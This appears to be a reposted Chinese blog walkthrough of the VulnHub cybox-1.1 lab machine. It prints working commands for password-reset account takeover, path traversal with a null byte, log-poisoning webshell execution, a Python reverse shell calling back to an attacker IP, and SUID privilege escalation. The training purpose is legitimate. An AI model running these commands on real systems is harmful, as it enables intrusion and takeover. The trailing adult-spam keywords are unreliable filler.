<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之cybox-1.1的實踐

    VSole2022-08-14 12:30:50

    今天實踐的是vulnhub的cybox-1.1鏡像,

    下載地址,https://download.vulnhub.com/cybox/cybox-1.1.ova,

    用workstation導入成功,直接就看到了地址,省的做地址掃描了,

    進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.144,

    看到靶機有不少服務,把域名cybox.company跟地址的對應記錄添加到etc/hosts文件中,然后做更多域名的發現,

    sudo apt install seclists,

    sudo gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u cybox.company,

    訪問register域名的頁面注冊個新賬號,gohacker,

    再訪問monitor域名的頁面同樣注冊新賬號,gohacker,

    然后再重置密碼,

    webmail域名這邊頁面下就收到了重置密碼的鏈接,

    把重置密碼鏈接里的郵箱改成admin的,這樣就成功改了admin的密碼,

    就可以用admin進行登錄了,

    查看Admin panel,

    再查看頁面源碼,

    發現了文件包含漏洞的提示,styles.php?style=general,

    嘗試查看密碼文件,http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../etc/passwd%00,

    又從ftp域名的頁面找到了命令注入的漏洞,

    通過burp suite向useragent里注入一句話木馬,

    猜測日志文件是/opt/bitnami/apache2/logs/access_log,

    驗證一句話木馬,

    http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../opt/bitnami/apache2/logs/access_log%00&cmd=ls,

    構造一個反彈shell命令,

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

    kali攻擊機這邊開一個反彈shell監聽,sudo nc -nvlp 443,

    訪問url觸發反彈shell,

    http://monitor.cybox.company/admin/styles.php?style=../../../../../../../../../../opt/bitnami/apache2/logs/access_log%00&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

    不是root,需要提權,

    先python -c 'import pty;pty.spawn("/bin/bash")'轉成交換式shell,

    find / -perm -4000 2>/dev/null查找root權限的應用,

    發現了/opt/registerlauncher,

    strings /opt/registerlauncher看到背后是/opt/register程序,

    strings /opt/register看到這個程序的內容,能夠創建系統賬戶,

    /opt/registerlauncher sudo創建一個叫sudo的賬戶,

    su sudo切到sudo賬戶,sudo -l確認有/bin/bash的執行權限,

    sudo /bin/bash拿到新的shell,id確認是root,

    sudosocket
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    apt install build-essential libssl-dev libffi-dev python3-dev # python相關環境。sudo apt-get install chromium-browser # 安裝chromium瀏覽器。flask run -p 80 -h 0.0.0.0 # 啟動后,打開該服務器外網ip,訪問http://外網ip 是否可以成功訪問并登錄web環境。結束flask運行,使用后臺運行
    簡介Bayonet是整合多款安全工具并以web形式展現,它輔助滲透測試人員對IT資產進行資產管理。演示效果這里我部署了3臺vps,其中a為主節點運行數據庫、web、client工具,其他b和c節點只需要運行client里相應工具安裝方法以ubuntu16全新系統為例# 1、安裝python3環境,這里推薦使用minicoda方式安裝:wget?# 根據提示進行安裝# 2、默認miniconda環境為python3.7,這里新創建一個python3.8環境
    vulnhub之cybox-1.1的實踐
    2022-08-14 12:30:50
    今天實踐的是vulnhub的cybox-1.1鏡像,下載地址,https://download.vulnhu
    端口服務探測sudo nmap -sC -sV 192.168.33.142 -oN BBS_CUTE.nmap. CMS 是 CuteNews 2.1.2 去 exploit-db 看下,有一個 RCE 漏洞,下 POC 來用一下修改一下 payload,運行。
    vulnhub之devguru的實踐
    2022-07-24 18:44:07
    今天實踐的是vulnhub的devguru鏡像,下載地址,https://download.vulnhub.
    RWDN dockerfile 這份 dockerfile 是從 出題人 手中拿到的 和現實的題目 稍微有點有差距的地方。
    需要這種特殊權限的場景在Linux下很常見。ping需要發送ICMP報文,而這個操作需要發送Raw Socket。比如,/bin/ping這個程序的所有者是root,它設置了s位,那么普通用戶在運行ping時其Effective UID就是0,等同于擁有了root權限。這里引入了一個新的概念Effective UID。第一部分指定用戶,第二部分指定可充當用戶,第三部分指定 sudo 可運行的命令。
    需要這種特殊權限的場景在Linux下很常見。已知的可以用來提權的Linux可執行文件有:CopyNmap、Vim、find、Bash、More、Less、Nano、cp比如常用的ping命令。
    攻擊者利用Microsoft Azure OMIGOD漏洞釋放Mirai和挖礦機。
    Linux|suid提權總結
    2021-09-15 09:38:59
    suid即set user id,是一種授予文件的權限類型,它允許用戶使用者以文件所有者的權限來執行文件。需要這種特殊權限的場景在Linux下很常見。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类